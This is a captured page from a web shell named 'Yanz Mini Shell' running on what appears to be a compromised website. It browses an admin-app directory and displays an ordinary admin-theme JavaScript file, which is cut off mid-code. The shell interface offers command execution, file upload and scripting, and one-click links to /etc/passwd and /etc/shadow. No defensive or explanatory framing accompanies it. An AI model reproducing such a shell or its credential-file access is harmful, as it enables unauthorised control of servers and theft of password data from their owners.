Yanz Mini Shell
[_]
[-]
[X]
[
HomeShell 1
] [
HomeShell 2
] [
Upload
] [
Command Shell
] [
Scripting
] [
About
]
[ Directory ] =>
/
home
firstmatrixcoin
public_html
ocean-arc.firstmatrix.co.in
admin-app
api
Action
[*]
New File
[*]
New Folder
Sensitive File
[*]
/etc/passwd
[*]
/etc/shadow
[*]
/etc/resolv.conf
[
Delete
] [
Edit
] [
Rename
] [
Back
]
window.theme = {}; // Theme Common Functions window.theme.fn = { getOptions: function(opts) { if (typeof(opts) == 'object') { return opts; } else if (typeof(opts) == 'string') { try { return JSON.parse(opts.replace(/'/g,'"').replace(';','')); } catch(e) { return {}; } } else { return {}; } } }; // Navigation (function($) { 'use strict'; var $items = $( '.nav-main li.nav-parent' ); function expand( $li ) { $li.children( 'ul.nav-children' ).slideDown( 'fast', function() { $li.addClass( 'nav-expanded' ); $(this).css( 'display', '' ); ensureVisible( $li ); }); } function collapse( $li ) { $li.children('ul.nav-children' ).slideUp( 'fast', function() { $(this).css( 'display', '' ); $li.removeClass( 'nav-expanded' ); }); } function ensureVisible( $li ) { var scroller = $li.offsetParent(); if ( !scroller.get(0) ) { return false; } var top = $li.position().top; if ( top < 0 ) { scroller.animate({ scrollTop: scroller.scrollTop() + top }, 'fast'); } } function buildSidebarNav( anchor, prev, next ) { if ( anchor.prop('href') ) { var arrowWidth = parseInt(window.getComputedStyle(anchor.get(0), ':after').width, 10) || 0; if (ev.offsetX > anchor.get(0).offsetWidth - arrowWidth) { ev.preventDefault(); } } if ( prev.get( 0 ) !== next.get( 0 ) ) { collapse( prev ); expand( next ); } else { collapse( prev ); } } $items.find('> a').on('click', function( ev ) { var $html = $('html'), $window = $(window), $anchor = $( this ), $prev = $anchor.closest('ul.nav').find('> li.nav-expanded' ), $next = $anchor.closest('li'); if( !$html.hasClass('sidebar-left-big-icons') ) { buildSidebarNav( $anchor, $prev, $next ); } else if( $html.hasClass('sidebar-left-big-icons') && $window.width() < 768 ) { buildSidebarNav( $anchor, $prev, $next ); } }); }).apply(this, [jQuery]); // Skeleton (function(theme, $) { 'use strict'; theme = theme || {}; var $body = $( 'body' ), $html = $( 'html' ), $window = $( window ), isAndroid = navigator.userAgent.toLowerCase().indexOf('android') > -1; // mobile devices with fixed has a lot of issues when focus inputs and others... if ( typeof $.browser !== 'undefined' && $.browser.mobile && $html.hasClass('fixed') ) { $html.removeClass( 'fixed' ).addClass( 'scroll' ); } var Skeleton = { options: { sidebars: { menu: '#content-menu', left: '#sidebar-left', right: '#sidebar-right' } }, customScroll: ( !Modernizr.overflowscrolling && !isAndroid && $.fn.nanoScroller !== 'undefined'), initialize: function() { this .setVars() .build() .events(); }, setVars: function() { this.sidebars = {}; this.sidebars.left = { $el: $( this.options.sidebars.left ) }; this.sidebars.right = { $el: $( this.options.sidebars.right ), isOpened: $html.hasClass( 'sidebar-right-opened' ) }; this.sidebars.menu = { $el: $( this.options.sidebars.menu ), isOpened: $html.hasClass( 'inner-menu-opened' ) }; return this; }, build: function() { if ( typeof $.browser !== 'undefined' && $.browser.mobile ) { $html.addClass( 'mobile-device' ); } else { $html.addClass( 'no-mobile-device' ); } $html.addClass( 'custom-scroll' ); if ( this.customScroll ) { this.buildSidebarLeft(); this.buildContentMenu(); } this.buildSidebarRight(); return this; }, events: function() { if ( this.customScroll ) { this.eventsSidebarLeft(); } this.eventsSidebarRight(); this.eventsContentMenu(); if ( typeof $.browser !== 'undefined' && !this.customScroll && isAndroid ) { this.fixScroll(); } return this; }, fixScroll: function() { var _self = this; $window .on( 'sidebar-left-opened sidebar-right-toggle', function( e, data ) { _self.preventBodyScrollToggle( data.added ); }); }, buildSidebarLeft: function() { var initialPosition = 0; this.sidebars.left.isOpened = !$html.hasClass( 'sidebar-left-collapsed' ) || $html.hasClass( 'sidebar-left-opened' ); this.sidebars.left.$nano = this.sidebars.left.$el.find( '.nano' ); if (typeof localStorage !== 'undefined') { this.sidebars.left.$nano.on('update', function(e, values) { localStorage.setItem('sidebar-left-position', values.position); }); if (localStorage.getItem('sidebar-left-position') !== null) { initialPosition = localStorage.getItem('sidebar-left-position'); this.sidebars.left.$el.find( '.nano-content').scrollTop(initialPosition); } } this.sidebars.left.$nano.nanoScroller({ scrollTop: initialPosition, alwaysVisible: true, preventPageScrolling: $html.hasClass( 'fixed' ) }); return this; }, eventsSidebarLeft: function() { var _self = this, $nano = this.sidebars.left.$nano; var open = function() { if ( _self.sidebars.left.isOpened ) { return close(); } _self.sidebars.left.isOpened = true; $html.addClass( 'sidebar-left-opened' ); $window.trigger( 'sidebar-left-toggle', { added: true, removed: false }); $html.on( 'click.close-left-sidebar', function(e) { e.stopPropagation(); close(e); }); }; var close = function(e) { if ( !!e && !!e.target && ($(e.target).closest( '.sidebar-left' ).get(0) || !$(e.target).closest( 'html' ).get(0)) ) { e.preventDefault(); return false; } else { $html.removeClass( 'sidebar-left-opened' ); $html.off( 'click.close-left-sidebar' ); $window.trigger( 'sidebar-left-toggle', { added: false, removed: true }); _self.sidebars.left.isOpened = !$html.hasClass( 'sidebar-left-collapsed' ); } }; var updateNanoScroll = function() { if ( $.support.transition ) { $nano.nanoScroller(); $nano .one('bsTransitionEnd', updateNanoScroll) .emulateTransitionEnd(150) } else { updateNanoScroll(); } }; var isToggler = function( element ) { return $(element).data('fire-event') === 'sidebar-left-toggle' || $(element).parents().data('fire-event') === 'sidebar-left-toggle'; }; this.sidebars.left.$el .on( 'click', function() { updateNanoScroll(); }) .on('touchend', function(e) { _self.sidebars.left.isOpened = !$html.hasClass( 'sidebar-left-collapsed' ) || $html.hasClass( 'sidebar-left-opened' ); if ( !_self.sidebars.left.isOpened && !isToggler(e.target) ) { e.stopPropagation(); e.preventDefault(); open(); } }); $nano .on( 'mouseenter', function() { if ( $html.hasClass( 'sidebar-left-collapsed' ) ) { $nano.nanoScroller(); } }) .on( 'mouseleave', function() { if ( $html.hasClass( 'sidebar-left-collapsed' ) ) { $nano.nanoScroller(); } }); $window.on( 'sidebar-left-toggle', function(e, toggle) { if ( toggle.removed ) { $html.removeClass( 'sidebar-left-opened' ); $html.off( 'click.close-left-sidebar' ); } // Recalculate Owl Carousel sizes $('.owl-carousel').trigger('refresh.owl.carousel'); }); return this; }, buildSidebarRight: function() { this.sidebars.right.isOpened = $html.hasClass( 'sidebar-right-opened' ); if ( this.customScroll ) { this.sidebars.right.$nano = this.sidebars.right.$el.find( '.nano' ); this.sidebars.right.$nano.nanoScroller({ alwaysVisible: true, preventPageScrolling: true }); } return this; }, eventsSidebarRight: function() { var _self = this; var open = function() { if ( _self.sidebars.right.isOpened ) { return close(); } _self.sidebars.right.isOpened = true; $html.addClass( 'sidebar-right-opened' ); $window.trigger( 'sidebar-right-toggle', { added: true, removed: false }); $html.on( 'click.close-right-sidebar', function(e) { e.stopPropagation(); close(e); }); }; var close = function(e) { if ( !!e && !!e.target && ($(e.target).closest( '.sidebar-right' ).get(0) || !$(e.target).closest( 'html' ).get(0)) ) { return false; } $html.removeClass( 'sidebar-right-opened' ); $html.off( 'click.close-right-sidebar' ); $window.trigger( 'sidebar-right-toggle', { added: false, removed: true }); _self.sidebars.right.isOpened = false; }; var bind = function() { $('[data-open="sidebar-right"]').on('click', function(e) { var $el = $(this); e.stopPropagation(); if ( $el.is('a') ) e.preventDefault(); open(); }); }; this.sidebars.right.$el.find( '.mobile-close' ) .on( 'click', function( e ) { e.preventDefault(); $html.trigger( 'click.close-right-sidebar' ); }); bind(); return this; }, buildContentMenu: function() { if ( !$html.hasClass( 'fixed' ) ) { return false; } this.sidebars.menu.$nano = this.sidebars.menu.$el.find( '.nano' ); this.sidebars.menu.$nano.nanoScroller({ alwaysVisible: true, preventPageScrolling: true }); return this; }, eventsContentMenu: function() { var _self = this; var open = function() { if ( _self.sidebars.menu.isOpened ) { return close(); } _self.sidebars.menu.isOpened = true; $html.addClass( 'inner-menu-opened' ); $window.trigger( 'inner-menu-toggle', { added: true, removed: false }); $html.on( 'click.close-inner-menu', function(e) { close(e); }); }; var close = function(e) { var hasEvent, hasTarget, isCollapseButton, isInsideModal, isInsideInnerMenu, isInsideHTML, $target; hasEvent = !!e; hasTarget = hasEvent && !!e.target; if ( hasTarget ) { $target = $(e.target); } isCollapseButton = hasTarget && !!$target.closest( '.inner-menu-collapse' ).get(0); isInsideModal = hasTarget && !!$target.closest( '.mfp-wrap' ).get(0); isInsideInnerMenu = hasTarget && !!$target.closest( '.inner-menu' ).get(0); isInsideHTML = hasTarget && !!$target.closest( 'html' ).get(0); if ( (!isCollapseButton && (isInsideInnerMenu || !isInsideHTML)) || isInsideModal ) { return false; } e.stopPropagation(); $html.removeClass( 'inner-menu-opened' ); $html.off( 'click.close-inner-menu' ); $window.trigger( 'inner-menu-toggle', { added: false, removed: true }); _self.sidebars.menu.isOpened = false; }; var bind = function() { $('[data-open="inner-menu"]').on('click', function(e) { var $el = $(this); e.stopPropagation(); if ( $el.is('a') ) e.preventDefault(); open(); }); }; bind(); /* Nano Scroll */ if ( $html.hasClass( 'fixed' ) ) { var $nano = this.sidebars.menu.$nano; var updateNanoScroll = function() { if ( $.support.transition ) { $nano.nanoScroller(); $nano .one('bsTransitionEnd', updateNanoScroll) .emulateTransitionEnd(150) } else { updateNanoScroll(); } }; this.sidebars.menu.$el .on( 'click', function() { updateNanoScroll(); }); } return this; }, preventBodyScrollToggle: function( shouldPrevent, $el ) { setTimeout(function() { if ( shouldPrevent ) { $body .data( 'scrollTop', $body.get(0).scrollTop ) .css({ position: 'fixed', top: $body.get(0).scrollTop * -1 }) } else { $body .css({ position: '', top: '' }) .scrollTop( $body.data( 'scrollTop' ) ); } }, 150); } }; // expose to scope $.extend(theme, { Skeleton: Skeleton }); }).apply(this, [window.theme, jQuery]); // Base (function(theme, $) { 'use strict'; theme = theme || {}; theme.Skeleton.initialize(); }).apply(this, [window.theme, jQuery]); window.theme = {}; // Panels (function($) { $(function() { $('.panel') .on( 'panel:toggle', function() { var $this, direction; $this = $(this); direction = $this.hasClass( 'panel-collapsed' ) ? 'Down' : 'Up'; $this.find('.panel-body, .panel-footer')[ 'slide' + direction ]( 200, function() { $this[ (direction === 'Up' ? 'add' : 'remove') + 'Class' ]( 'panel-collapsed' ) }); }) .on( 'panel:dismiss', function() { var $this = $(this); if ( !!( $this.parent('div').attr('class') || '' ).match( /col-(xs|sm|md|lg)/g ) && $this.siblings().length === 0 ) { $row = $this.closest('.row'); $this.parent('div').remove(); if ( $row.children().length === 0 ) { $row.remove(); } } else { $this.remove(); } }) .on( 'click', '[data-panel-toggle]', function( e ) { e.preventDefault(); $(this).closest('.panel').trigger( 'panel:toggle' ); }) .on( 'click', '[data-panel-dismiss]', function( e ) { e.preventDefault(); $(this).closest('.panel').trigger( 'panel:dismiss' ); }) /* Deprecated */ .on( 'click', '.panel-actions a.fa-caret-up', function( e ) { e.preventDefault(); var $this = $( this ); $this .removeClass( 'fa-caret-up' ) .addClass( 'fa-caret-down' ); $this.closest('.panel').trigger( 'panel:toggle' ); }) .on( 'click', '.panel-actions a.fa-caret-down', function( e ) { e.preventDefault(); var $this = $( this ); $this .removeClass( 'fa-caret-down' ) .addClass( 'fa-caret-up' ); $this.closest('.panel').trigger( 'panel:toggle' ); }) .on( 'click', '.panel-actions a.fa-times', function( e ) { e.preventDefault(); var $this = $( this ); $this.closest('.panel').trigger( 'panel:dismiss' ); }); }); })(jQuery); // Bootstrap Toggle (function($) { 'use strict'; var $window = $( window ); var toggleClass = function( $el ) { if ( !!$el.data('toggleClassBinded') ) { return false; } var $target, className, eventName; $target = $( $el.attr('data-target') ); className = $el.attr('data-toggle-class'); eventName = $el.attr('data-fire-event'); $el.on('click.toggleClass', function(e) { e.preventDefault(); $target.toggleClass( className ); var hasClass = $target.hasClass( className ); if ( !!eventName ) { $window.trigger( eventName, { added: hasClass, removed: !hasClass }); } }); $el.data('toggleClassBinded', true); return true; }; $(function() { $('[data-toggle-class][data-target]').each(function() { toggleClass( $(this) ); }); }); }).apply(this, [jQuery]); // Form to Object (function($) { 'use strict'; $.fn.formToObject = function() { var arrayData, objectData; arrayData = this.serializeArray(); objectData = {}; $.each( arrayData, function() { var value; if (this.value != null) { value = this.value; } else { value = ''; } if (objectData[this.name] != null) { if (!objectData[this.name].push) { objectData[this.name] = [objectData[this.name]]; } objectData[this.name].push(value); } else { objectData[this.name] = value; } }); return objectData; }; })(jQuery); // Scroll to Top (function(theme, $) { theme = theme || {}; $.extend(theme, { PluginScrollToTop: { defaults: { wrapper: $('body'), offset: 150, buttonClass: 'scroll-to-top', iconClass: 'fa fa-chevron-up', delay: 500, visibleMobile: false, label: false }, initialize: function(opts) { initialized = true; this .setOptions(opts) .build() .events(); return this; }, setOptions: function(opts) { this.options = $.extend(true, {}, this.defaults, opts); return this; }, build: function() { var self = this, $el; // Base HTML Markup $el = $('<a />') .addClass(self.options.buttonClass) .attr({ 'href': '#', }) .append( $('<i />') .addClass(self.options.iconClass) ); // Visible Mobile if (!self.options.visibleMobile) { $el.addClass('hidden-mobile'); } // Label if (self.options.label) { $el.append( $('<span />').html(self.options.label) ); } this.options.wrapper.append($el); this.$el = $el; return this; }, events: function() { var self = this, _isScrolling = false; // Click Element Action self.$el.on('click', function(e) { e.preventDefault(); $('body, html').animate({ scrollTop: 0 }, self.options.delay); return false; }); // Show/Hide Button on Window Scroll event. $(window).scroll(function() { if (!_isScrolling) { _isScrolling = true; if ($(window).scrollTop() > self.options.offset) { self.$el.stop(true, true).addClass('visible'); _isScrolling = false; } else { self.$el.stop(true, true).removeClass('visible'); _isScrolling = false; } } }); return this; } } }); }).apply(this, [window.theme, jQuery]); // Datepicker (function(theme, $) { theme = theme || {}; var instanceName = '__datepicker'; var PluginDatePicker = function($el, opts) { return this.initialize($el, opts); }; PluginDatePicker.defaults = { orientation: "bottom", }; PluginDatePicker.prototype = { initialize: function($el, opts) { if ( $el.data( instanceName ) ) { return this; } this.$el = $el; this .setVars() .setData() .setOptions(opts) .build(); return this; }, setVars: function() { this.skin = this.$el.data( 'plugin-skin' ); return this; }, setData: function() { this.$el.data(instanceName, this); return this; }, setOptions: function(opts) { this.options = $.extend( true, {}, PluginDatePicker.defaults, opts ); return this; }, build: function() { this.$el.datepicker( this.options ); if ( !!this.skin ) { this.$el.data('datepicker').picker.addClass( 'datepicker-' + this.skin ); } return this; } }; // expose to scope $.extend(theme, { PluginDatePicker: PluginDatePicker }); // jquery plugin $.fn.themePluginDatePicker = function(opts) { return this.each(function() { var $this = $(this); if ($this.data(instanceName)) { return $this.data(instanceName); } else { return new PluginDatePicker($this, opts); } }); } }).apply(this, [window.theme, jQuery]); // Loading Overlay (function(theme, $) { 'use strict'; theme = theme || {}; var loadingOverlayTemplate = [ '<div class="loading-overlay dark">', '<div class="ring-loader">Loading <span></span></div>', '</div>' ].join(''); var LoadingOverlay = function( $wrapper, options ) { return this.initialize( $wrapper, options ); }; LoadingOverlay.prototype = { options: { css: {} }, initialize: function( $wrapper, options ) { this.$wrapper = $wrapper; this .setVars() .setOptions( options ) .build() .events(); this.$wrapper.data( 'loadingOverlay', this ); }, setVars: function() { this.$overlay = this.$wrapper.find('.loading-overlay'); return this; }, setOptions: function( options ) { if ( !this.$overlay.get(0) ) { this.matchProperties(); } this.options = $.extend( true, {}, this.options, options ); this.loaderClass = this.getLoaderClass( this.options.css.backgroundColor ); return this; }, build: function() { if ( !this.$overlay.closest(document.documentElement).get(0) ) { if ( !this.$cachedOverlay ) { this.$overlay = $( loadingOverlayTemplate ).clone(); if ( this.options.css ) { this.$overlay.css( this.options.css ); this.$overlay.find( '.loader' ).addClass( this.loaderClass ); } } else { this.$overlay = this.$cachedOverlay.clone(); } this.$wrapper.append( this.$overlay ); } if ( !this.$cachedOverlay ) { this.$cachedOverlay = this.$overlay.clone(); } return this; }, events: function() { var _self = this; if ( this.options.startShowing ) { _self.show(); } if ( this.$wrapper.is('body') || this.options.hideOnWindowLoad ) { $( window ).on( 'load error', function() { _self.hide(); }); } if ( this.options.listenOn ) { $( this.options.listenOn ) .on( 'loading-overlay:show beforeSend.ic', function( e ) { e.stopPropagation(); _self.show(); }) .on( 'loading-overlay:hide complete.ic', function( e ) { e.stopPropagation(); _self.hide(); }); } this.$wrapper .on( 'loading-overlay:show beforeSend.ic', function( e ) { if ( e.target === _self.$wrapper.get(0) ) { e.stopPropagation(); _self.show(); return true; } return false; }) .on( 'loading-overlay:hide complete.ic', function( e ) { if ( e.target === _self.$wrapper.get(0) ) { e.stopPropagation(); _self.hide(); return true; } return false; }); return this; }, show: function() { this.build(); this.position = this.$wrapper.css( 'position' ).toLowerCase(); if ( this.position != 'relative' || this.position != 'absolute' || this.position != 'fixed' ) { this.$wrapper.css({ position: 'relative' }); } this.$wrapper.addClass( 'loading-overlay-showing' ); }, hide: function() { var _self = this; this.$wrapper.removeClass( 'loading-overlay-showing' ); setTimeout(function() { if ( this.position != 'relative' || this.position != 'absolute' || this.position != 'fixed' ) { _self.$wrapper.css({ position: '' }); } }, 500); }, matchProperties: function() { var i, l, properties; properties = [ 'backgroundColor', 'borderRadius' ]; l = properties.length; for( i = 0; i < l; i++ ) { var obj = {}; obj[ properties[ i ] ] = this.$wrapper.css( properties[ i ] ); $.extend( this.options.css, obj ); } }, getLoaderClass: function( backgroundColor ) { if ( !backgroundColor || backgroundColor === 'transparent' || backgroundColor === 'inherit' ) { return 'black'; } var hexColor, r, g, b, yiq; var colorToHex = function( color ){ var hex, rgb; if( color.indexOf('#') >- 1 ){ hex = color.replace('#', ''); } else { rgb = color.match(/\d+/g); hex = ('0' + parseInt(rgb[0], 10).toString(16)).slice(-2) + ('0' + parseInt(rgb[1], 10).toString(16)).slice(-2) + ('0' + parseInt(rgb[2], 10).toString(16)).slice(-2); } if ( hex.length === 3 ) { hex = hex + hex; } return hex; }; hexColor = colorToHex( backgroundColor ); r = parseInt( hexColor.substr( 0, 2), 16 ); g = parseInt( hexColor.substr( 2, 2), 16 ); b = parseInt( hexColor.substr( 4, 2), 16 ); yiq = ((r * 299) + (g * 587) + (b * 114)) / 1000; return ( yiq >= 128 ) ? 'black' : 'white'; } }; // expose to scope $.extend(theme, { LoadingOverlay: LoadingOverlay }); // expose as a jquery plugin $.fn.loadingOverlay = function( opts ) { return this.each(function() { var $this = $( this ); var loadingOverlay = $this.data( 'loadingOverlay' ); if ( loadingOverlay ) { return loadingOverlay; } else { var options = opts || $this.data( 'loading-overlay-options' ) || {}; return new LoadingOverlay( $this, options ); } }); } // auto init $('[data-loading-overlay]').loadingOverlay(); }).apply(this, [window.theme, jQuery]); // MaxLength (function(theme, $) { theme = theme || {}; var instanceName = '__maxlength'; var PluginMaxLength = function($el, opts) { return this.initialize($el, opts); }; PluginMaxLength.defaults = { alwaysShow: true, placement: 'bottom-left', warningClass: 'label label-success bottom-left', limitReachedClass: 'label label-danger bottom-left' }; PluginMaxLength.prototype = { initialize: function($el, opts) { if ( $el.data( instanceName ) ) { return this; } this.$el = $el; this .setData() .setOptions(opts) .build(); return this; }, setData: function() { this.$el.data(instanceName, this); return this; }, setOptions: function(opts) { this.options = $.extend( true, {}, PluginMaxLength.defaults, opts ); return this; }, build: function() { this.$el.maxlength( this.options ); this.$el.on('blur', function() { $('.bootstrap-maxlength').remove(); }); return this; } }; // expose to scope $.extend(theme, { PluginMaxLength: PluginMaxLength }); // jquery plugin $.fn.themePluginMaxLength = function(opts) { return this.each(function() { var $this = $(this); if ($this.data(instanceName)) { return $this.data(instanceName); } else { return new PluginMaxLength($this, opts); } }); } }).apply(this, [window.theme, jQuery]); // MultiSelect (function(theme, $) { theme = theme || {}; var instanceName = '__multiselect'; var PluginMultiSelect = function($el, opts) { return this.initialize($el, opts); }; PluginMultiSelect.defaults = { templates: { filter: '<div class="input-group"><span class="input-group-addon"><i class="fa fa-search"></i></span><input class="form-control multiselect-search" type="text"></div>' } }; PluginMultiSelect.prototype = { initialize: function($el, opts) { if ( $el.data( instanceName ) ) { return this; } this.$el = $el; this .setData() .setOptions(opts) .build(); return this; }, setData: function() { this.$el.data(instanceName, this); return this; }, setOptions: function(opts) { this.options = $.extend( true, {}, PluginMultiSelect.defaults, opts ); return this; }, build: function() { this.$el.multiselect( this.options ); return this; } }; // expose to scope $.extend(theme, { PluginMultiSelect: PluginMultiSelect }); // jquery plugin $.fn.themePluginMultiSelect = function(opts) { return this.each(function() { var $this = $(this); if ($this.data(instanceName)) { return $this.data(instanceName); } else { return new PluginMultiSelect($this, opts); } }); } }).apply(this, [window.theme, jQuery]); // Select2 (function(theme, $) { theme = theme || {}; var instanceName = '__select2'; var PluginSelect2 = function($el, opts) { return this.initialize($el, opts); }; PluginSelect2.defaults = { theme: 'bootstrap' }; PluginSelect2.prototype = { initialize: function($el, opts) { if ( $el.data( instanceName ) ) { return this; } this.$el = $el; this .setData() .setOptions(opts) .build(); return this; }, setData: function() { this.$el.data(instanceName, this); return this; }, setOptions: function(opts) { this.options = $.extend( true, {}, PluginSelect2.defaults, opts ); return this; }, build: function() { this.$el.select2( this.options ); return this; } }; // expose to scope $.extend(theme, { PluginSelect2: PluginSelect2 }); // jquery plugin $.fn.themePluginSelect2 = function(opts) { return this.each(function() { var $this = $(this); if ($this.data(instanceName)) { return $this.data(instanceName); } else { return new PluginSelect2($this, opts); } }); } }).apply(this, [window.theme, jQuery]); // Spinner (function(theme, $) { theme = theme || {}; var instanceName = '__spinner'; var PluginSpinner = function($el, opts) { return this.initialize($el, opts); }; PluginSpinner.defaults = { }; PluginSpinner.prototype = { initialize: function($el, opts) { if ( $el.data( instanceName ) ) { return this; } this.$el = $el; this .setData() .setOptions(opts) .build(); return this; }, setData: function() { this.$el.data(instanceName, this); return this; }, setOptions: function(opts) { this.options = $.extend( true, {}, PluginSpinner.defaults, opts ); return this; }, build: function() { this.$el.spinner( this.options ); return this; } }; // expose to scope $.extend(theme, { PluginSpinner: PluginSpinner }); // jquery plugin $.fn.themePluginSpinner = function(opts) { return this.each(function() { var $this = $(this); if ($this.data(instanceName)) { return $this.data(instanceName); } else { return new PluginSpinner($this, opts); } }); } }).apply(this, [window.theme, jQuery]); // TextArea AutoSize (function(theme, $) { theme = theme || {}; var initialized = false; var instanceName = '__textareaAutosize'; var PluginTextAreaAutoSize = function($el, opts) { return this.initialize($el, opts); }; PluginTextAreaAutoSize.defaults = { }; PluginTextAreaAutoSize.prototype = { initialize: function($el, opts) { if (initialized) { return this; } this.$el = $el; this .setData() .setOptions(opts) .build(); return this; }, setData: function() { this.$el.data(instanceName, this); return this; }, setOptions: function(opts) { this.options = $.extend( true, {}, PluginTextAreaAutoSize.defaults, opts ); return this; }, build: function() { autosize($(this.$el)); return this; } }; // expose to scope $.extend(theme, { PluginTextAreaAutoSize: PluginTextAreaAutoSize }); // jquery plugin $.fn.themePluginTextAreaAutoSize = function(opts) { return this.each(function() { var $this = $(this); if ($this.data(instanceName)) { return $this.data(instanceName); } else { return new PluginTextAreaAutoSize($this, opts); } }); } }).apply(this, [window.theme, jQuery]); // TimePicker (function(theme, $) { theme = theme || {}; var instanceName = '__timepicker'; var PluginTimePicker = function($el, opts) { return this.initialize($el, opts); }; PluginTimePicker.defaults = { disableMousewheel: true }; PluginTimePicker.prototype = { initialize: function($el, opts) { if ( $el.data( instanceName ) ) { return this; } this.$el = $el; this .setData() .setOptions(opts) .build(); return this; }, setData: function() { this.$el.data(instanceName, this); return this; }, setOptions: function(opts) { this.options = $.extend( true, {}, PluginTimePicker.defaults, opts ); return this; }, build: function() { this.$el.timepicker( this.options ); return this; } }; // expose to scope $.extend(theme, { PluginTimePicker: PluginTimePicker }); // jquery plugin $.fn.themePluginTimePicker = function(opts) { return this.each(function() { var $this = $(this); if ($this.data(instanceName)) { return $this.data(instanceName); } else { return new PluginTimePicker($this, opts); } }); } }).apply(this, [window.theme, jQuery]); // Animate (function(theme, $) { theme = theme || {}; var instanceName = '__animate'; var PluginAnimate = function($el, opts) { return this.initialize($el, opts); }; PluginAnimate.defaults = { accX: 0, accY: -150, delay: 1 }; PluginAnimate.prototype = { initialize: function($el, opts) { if ( $el.data( instanceName ) ) { return this; } this.$el = $el; this .setData() .setOptions(opts) .build(); return this; }, setData: function() { this.$el.data(instanceName, this); return this; }, setOptions: function(opts) { this.options = $.extend(true, {}, PluginAnimate.defaults, opts, { wrapper: this.$el }); return this; }, build: function() { var self = this, $el = this.options.wrapper, delay = 0; $el.addClass('appear-animation'); if(!$('html').hasClass('no-csstransitions') && $(window).width() > 767) { $el.appear(function() { delay = ($el.attr('data-appear-animation-delay') ? $el.attr('data-appear-animation-delay') : self.options.delay); if(delay > 1) { $el.css('animation-delay', delay + 'ms'); } $el.addClass($el.attr('data-appear-animation')); setTimeout(function() { $el.addClass('appear-animation-visible'); }, delay); }, {accX: self.options.accX, accY: self.options.accY}); } else { $el.addClass('appear-animation-visible'); } return this; } }; // expose to scope $.extend(theme, { PluginAnimate: PluginAnimate }); // jquery plugin $.fn.themePluginAnimate = function(opts) { return this.map(function() { var $this = $(this); if ($this.data(instanceName)) { return $this.data(instanceName); } else { return new PluginAnimate($this, opts); } }); }; }).apply(this, [window.theme, jQuery]); // Scrollable (function(theme, $) { theme = theme || {}; var instanceName = '__scrollable'; var PluginScrollable = function($el, opts) { return this.initialize($el, opts); }; PluginScrollable.updateModals = function() { PluginScrollable.updateBootstrapModal(); }; PluginScrollable.updateBootstrapModal = function() { var updateBoostrapModal; updateBoostrapModal = typeof $.fn.modal !== 'undefined'; updateBoostrapModal = updateBoostrapModal && typeof $.fn.modal.Constructor !== 'undefined'; updateBoostrapModal = updateBoostrapModal && typeof $.fn.modal.Constructor.prototype !== 'undefined'; updateBoostrapModal = updateBoostrapModal && typeof $.fn.modal.Constructor.prototype.enforceFocus !== 'undefined'; if ( !updateBoostrapModal ) { return false; } var originalFocus = $.fn.modal.Constructor.prototype.enforceFocus; $.fn.modal.Constructor.prototype.enforceFocus = function() { originalFocus.apply( this ); var $scrollable = this.$element.find('.scrollable'); if ( $scrollable ) { if ( $.isFunction($.fn['themePluginScrollable']) ) { $scrollable.themePluginScrollable(); } if ( $.isFunction($.fn['nanoScroller']) ) { $scrollable.nanoScroller(); } } }; }; PluginScrollable.defaults = { contentClass: 'scrollable-content', paneClass: 'scrollable-pane', sliderClass: 'scrollable-slider', alwaysVisible: true, preventPageScrolling: true }; PluginScrollable.prototype = { initialize: function($el, opts) { if ( $el.data( instanceName ) ) { return this; } this.$el = $el; this .setData() .setOptions(opts) .build(); return this; }, setData: function() { this.$el.data(instanceName, this); return this; }, setOptions: function(opts) { this.options = $.extend(true, {}, PluginScrollable.defaults, opts, { wrapper: this.$el }); return this; }, build: function() { this.options.wrapper.nanoScroller(this.options); return this; } }; // expose to scope $.extend(theme, { PluginScrollable: PluginScrollable }); // jquery plugin $.fn.themePluginScrollable = function(opts) { return this.each(function() { var $this = $(this); if ($this.data(instanceName)) { return $this.data(instanceName); } else { return new PluginScrollable($this, opts); } }); }; $(function() { PluginScrollable.updateModals(); }); }).apply(this, [window.theme, jQuery]); // Data Tables - Config (function($) { 'use strict'; // we overwrite initialize of all datatables here // because we want to use select2, give search input a bootstrap look // keep in mind if you overwrite this fnInitComplete somewhere, // you should run the code inside this function to keep functionality. // // there's no better way to do this at this time :( if ( $.isFunction( $.fn[ 'DataTable' ] ) ) { $.extend(true, $.fn.DataTable.defaults, { language: { lengthMenu: '_MENU_ rows per page', processing: '<i class="fas fa-spinner fa-spin"></i> Loading', paginate: {'next': '<i class="fa fa-chevron-right"></i>', 'previous': '<i class="fa fa-chevron-left"></i>'}, search: '' }, fnInitComplete: function( settings, json ) { // select 2 if ( $.isFunction( $.fn[ 'select2' ] ) ) { $('.dataTables_length select', settings.nTableWrapper).select2({ theme: 'bootstrap', minimumResultsForSearch: -1 }); } var options = $( 'table', settings.nTableWrapper ).data( 'plugin-options' ) || {}; // search var $search = $('.dataTables_filter input', settings.nTableWrapper); $search .attr({ placeholder: typeof options.searchPlaceholder !== 'undefined' ? options.searchPlaceholder : 'Search...' }) .removeClass('input-sm').addClass('form-control pull-right'); if ( $.isFunction( $.fn.placeholder ) ) { $search.placeholder(); } } }); } }).apply(this, [jQuery]); // Toggle (function(theme, $) { theme = theme || {}; var instanceName = '__toggle'; var PluginToggle = function($el, opts) { return this.initialize($el, opts); }; PluginToggle.defaults = { duration: 350, isAccordion: false, addIcons: true }; PluginToggle.prototype = { initialize: function($el, opts) { if ( $el.data( instanceName ) ) { return this; } this.$el = $el; this .setData() .setOptions(opts) .build(); return this; }, setData: function() { this.$el.data(instanceName, this); return this; }, setOptions: function(opts) { this.options = $.extend(true, {}, PluginToggle.defaults, opts, { wrapper: this.$el }); return this; }, build: function() { var self = this, $wrapper = this.options.wrapper, $items = $wrapper.find('.toggle'), $el = null; $items.each(function() { $el = $(this); if(self.options.addIcons) { $el.find('> label').prepend( $('<i />').addClass('fa fa-plus'), $('<i />').addClass('fa fa-minus') ); } if($el.hasClass('active')) { $el.find('> p').addClass('preview-active'); $el.find('> .toggle-content').slideDown(self.options.duration); } self.events($el); }); if(self.options.isAccordion) { self.options.duration = self.options.duration/2; } return this; }, events: function($el) { var self = this, previewParCurrentHeight = 0, previewParAnimateHeight = 0, toggleContent = null; $el.find('> label').on("click", function(e) { var $this = $(this), parentSection = $this.parent(), parentWrapper = $this.parents('.toggle'), previewPar = null, closeElement = null; if(self.options.isAccordion && typeof(e.originalEvent) != 'undefined') { closeElement = parentWrapper.find('.toggle.active > label'); if(closeElement[0] == $this[0]) { return; } } parentSection.toggleClass('active'); // Preview Paragraph if(parentSection.find('> p').get(0)) { previewPar = parentSection.find('> p'); previewParCurrentHeight = previewPar.css('height'); previewPar.css('height', 'auto'); 